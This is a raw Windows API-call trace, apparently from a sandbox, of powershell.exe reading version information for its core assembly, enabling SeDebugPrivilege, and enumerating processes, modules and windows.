	[0608.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.883] GetVersionExW (in: lpVersionInformation=0x14d610*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d610*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0609.884] SetErrorMode (uMode=0x1) returned 0x1
	[0609.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d770 | out: lpFileInformation=0x14d770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0609.887] SetErrorMode (uMode=0x1) returned 0x1
	[0609.890] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14d9e0 | out: lpdwHandle=0x14d9e0) returned 0x94c
	[0609.902] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d272d8 | out: lpData=0x2d272d8) returned 1
	[0609.904] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d958, puLen=0x14d950 | out: lplpBuffer=0x14d958*=0x2d27374, puLen=0x14d950) returned 1
	[0609.907] lstrlenW (lpString="䅁") returned 1
	[0610.795] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d27450, puLen=0x14d8c0) returned 1
	[0610.796] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0610.798] CoTaskMemAlloc (cb=0x2e) returned 0x25b890
	[0610.798] lstrcpyW (in: lpString1=0x25b890, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0610.799] CoTaskMemFree (pv=0x25b890) 
	[0610.799] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d274a4, puLen=0x14d8c0) returned 1
	[0610.799] lstrlenW (lpString="System.Management.Automation") returned 28
	[0610.799] CoTaskMemAlloc (cb=0x3c) returned 0x1e9860
	[0610.800] lstrcpyW (in: lpString1=0x1e9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0610.800] CoTaskMemFree (pv=0x1e9860) 
	[0610.800] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d27500, puLen=0x14d8c0) returned 1
	[0610.800] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0610.800] CoTaskMemAlloc (cb=0x20) returned 0x2b8cf0
	[0610.800] lstrcpyW (in: lpString1=0x2b8cf0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0610.800] CoTaskMemFree (pv=0x2b8cf0) 
	[0610.800] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d27540, puLen=0x14d8c0) returned 1
	[0610.800] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0610.800] CoTaskMemAlloc (cb=0x44) returned 0x1e9860
	[0610.800] lstrcpyW (in: lpString1=0x1e9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0610.800] CoTaskMemFree (pv=0x1e9860) 
	[0610.800] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d275a8, puLen=0x14d8c0) returned 1
	[0610.800] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0610.800] CoTaskMemAlloc (cb=0x76) returned 0x2539b0
	[0610.800] lstrcpyW (in: lpString1=0x2539b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0610.800] CoTaskMemFree (pv=0x2539b0) 
	[0610.800] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d27644, puLen=0x14d8c0) returned 1
	[0610.800] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0610.801] CoTaskMemAlloc (cb=0x44) returned 0x1e9860
	[0610.801] lstrcpyW (in: lpString1=0x1e9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0610.801] CoTaskMemFree (pv=0x1e9860) 
	[0610.801] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d276a8, puLen=0x14d8c0) returned 1
	[0610.801] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0610.801] CoTaskMemAlloc (cb=0x58) returned 0x237460
	[0610.801] lstrcpyW (in: lpString1=0x237460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0610.801] CoTaskMemFree (pv=0x237460) 
	[0610.801] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d27724, puLen=0x14d8c0) returned 1
	[0610.801] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0610.801] CoTaskMemAlloc (cb=0x20) returned 0x2b8cf0
	[0610.801] lstrcpyW (in: lpString1=0x2b8cf0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0610.801] CoTaskMemFree (pv=0x2b8cf0) 
	[0610.801] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d273cc, puLen=0x14d8c0) returned 1
	[0610.801] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0610.801] CoTaskMemAlloc (cb=0x66) returned 0x2ab800
	[0610.801] lstrcpyW (in: lpString1=0x2ab800, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0610.801] CoTaskMemFree (pv=0x2ab800) 
	[0610.802] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x0, puLen=0x14d8c0) returned 0
	[0610.802] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x0, puLen=0x14d8c0) returned 0
	[0610.802] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x0, puLen=0x14d8c0) returned 0
	[0610.802] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d898, puLen=0x14d890 | out: lplpBuffer=0x14d898*=0x2d27374, puLen=0x14d890) returned 1
	[0610.803] CoTaskMemAlloc (cb=0x204) returned 0x2566b0
	[0610.803] VerLanguageNameW (in: wLang=0x0, szLang=0x2566b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0610.805] CoTaskMemFree (pv=0x2566b0) 
	[0610.805] VerQueryValueW (in: pBlock=0x2d272d8, lpSubBlock="\\", lplpBuffer=0x14d8e8, puLen=0x14d8e0 | out: lplpBuffer=0x14d8e8*=0x2d27300, puLen=0x14d8e0) returned 1
	[0610.811] GetCurrentProcessId () returned 0xe94
	[0610.827] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14c810 | out: lpLuid=0x14c810*(LowPart=0x14, HighPart=0)) returned 1
	[0611.767] GetCurrentProcess () returned 0xffffffffffffffff
	[0611.768] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14c830 | out: TokenHandle=0x14c830*=0x1c4) returned 1
	[0611.769] AdjustTokenPrivileges (in: TokenHandle=0x1c4, DisableAllPrivileges=0, NewState=0x2d2ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0611.770] CloseHandle (hObject=0x1c4) returned 1
	[0611.775] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe94) returned 0x1c4
	[0611.784] EnumProcessModules (in: hProcess=0x1c4, lphModule=0x2d2abb8, cb=0x200, lpcbNeeded=0x14d848 | out: lphModule=0x2d2abb8, lpcbNeeded=0x14d848) returned 1
	[0611.786] GetModuleInformation (in: hProcess=0x1c4, hModule=0x13f370000, lpmodinfo=0x2d2ae28, cb=0x18 | out: lpmodinfo=0x2d2ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0611.787] CoTaskMemAlloc (cb=0x804) returned 0x2bb0e0
	[0611.787] GetModuleBaseNameW (in: hProcess=0x1c4, hModule=0x13f370000, lpBaseName=0x2bb0e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0611.788] CoTaskMemFree (pv=0x2bb0e0) 
	[0611.788] CoTaskMemAlloc (cb=0x804) returned 0x2bb0e0
	[0611.789] GetModuleFileNameExW (in: hProcess=0x1c4, hModule=0x13f370000, lpFilename=0x2bb0e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0611.789] CoTaskMemFree (pv=0x2bb0e0) 
	[0611.790] CloseHandle (hObject=0x1c4) returned 1
	[0611.798] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xe94) returned 0x1c4
	[0611.799] GetExitCodeProcess (in: hProcess=0x1c4, lpExitCode=0x14d978 | out: lpExitCode=0x14d978*=0x103) returned 1
	[0612.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b088, Length=0x20000, ResultLength=0x14d940 | out: SystemInformation=0x12d2b088, ResultLength=0x14d940*=0x36c00) returned 0xc0000004
	[0612.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d4b0b8, Length=0x39400, ResultLength=0x14d940 | out: SystemInformation=0x12d4b0b8, ResultLength=0x14d940*=0x36c00) returned 0x0
	[0613.800] EnumWindows (lpEnumFunc=0x2c266ac, lParam=0x0) returned 1
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x558
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x538
	[0613.802] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.803] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x778
	[0613.803] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x778
	[0613.803] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.803] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.806] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.806] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.806] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.806] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.806] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x460
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x4d0
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x3a8
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1bd0
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1bfc
	[0613.807] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1a78
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b90
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b04
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b34
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1b64
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1bb0
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1acc
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1a2c
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x19a8
	[0613.808] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1944
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x18c8
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x18ac
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x18ec
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1898
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc98
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x153c
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1808
	[0613.809] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12a4
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1740
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16c4
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1820
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16ac
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1858
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1664
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10b4
	[0613.810] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10ac
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10ec
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1068
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x17e0
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x102c
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x17a4
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1050
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1694
	[0613.811] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1770
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1720
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x165c
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1578
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x16c0
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x161c
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1638
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x15c8
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1554
	[0613.812] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1674
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1520
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x14bc
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xf8c
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xe9c
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1434
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x14ec
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xfcc
	[0613.813] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12ac
	[0613.814] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1484
	[0613.814] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x934
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc0c
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xb08
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x948
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1178
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x13e0
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xcd0
	[0613.817] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x13fc
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xdc8
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc18
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xc2c
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xa1c
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1244
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0xdb0
	[0613.818] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1398
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1358
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1370
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1340
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x130c
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12c0
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x12e4
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1270
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1298
	[0613.819] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x120c
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x122c
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x11c4
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x11b0
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1188
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1148
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x1160
	[0613.820] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14d6a0 | out: lpdwProcessId=0x14d6a0) returned 0x10fc
